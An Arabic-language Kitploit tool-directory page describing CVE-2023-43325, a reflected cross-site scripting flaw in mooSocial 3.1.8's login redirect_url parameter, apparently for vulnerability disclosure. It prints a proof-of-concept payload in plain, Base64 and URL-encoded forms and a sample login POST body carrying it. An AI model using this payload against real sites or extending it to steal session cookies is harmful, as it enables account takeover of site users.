Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2023-43325 — mooSocial v3.1.8 معرضة لهجوم البرمجة النصية عبر المواقع في وظيفة تسجيل الدخول. | Kitploit
أدوات/GitHubGitHub/ahrixia/cve-2023-43325
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبأمن الويباختبار الاختراق
GitHubahrixia/cve-2023-43325

CVE-2023-43325

mooSocial v3.1.8 معرضة لهجوم البرمجة النصية عبر المواقع في وظيفة تسجيل الدخول.

عرض المستودع
1منذ 2 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

mooSocial: XSS (CVE-2023-43325)

توجد ثغرة XSS (Cross-Site Scripting) منعكسة في الوسيط data[redirect_url] في وظيفة تسجيل الدخول لمستخدم mooSocial الإصدار 3.1.8، والتي تسمح للمهاجمين بسرقة ملفات تعريف الارتباط الخاصة بالجلسة (session cookies) للمستخدم وانتحال حسابه عبر رابط معدّل.

الوسيط المعرّض للثغرة: data[redirect_url]

الاستغلال - إثبات المفهوم (PoC)

ثغرة XSS المنعكسة

root@kitploit:~
Payload : test">test 
Payload (Base64 encoded) : dGVzdCI+PGltZyBzcmM9YSBvbmVycm9yPWFsZXJ0KDEpPnRlc3Q=
Final Payload (Base64+Url encoded): dGVzdCI%2bPGltZyBzcmM9YSBvbmVycm9yPWFsZXJ0KDEpPnRlc3Q%3d%3d

طلب POST على /moosocial/users/login (بيانات طلب POST فقط):

root@kitploit:~
[_method=POST&data%5Bredirect_url%5D=dGVzdCI%2bPGltZyBzcmM9YSBvbmVycm9yPWFsZXJ0KDEpPnRlc3Q%3d%3d&data%5BUser%5D%5Bid%5D=&data%5BUser%5D%5Bemail%5D=admin%40localhost.com&data%5BUser%5D%5Bpassword%5D=pas[redacted]&data%5Bremember%5D=0]

لقطة شاشة

image
تنزيل الأداة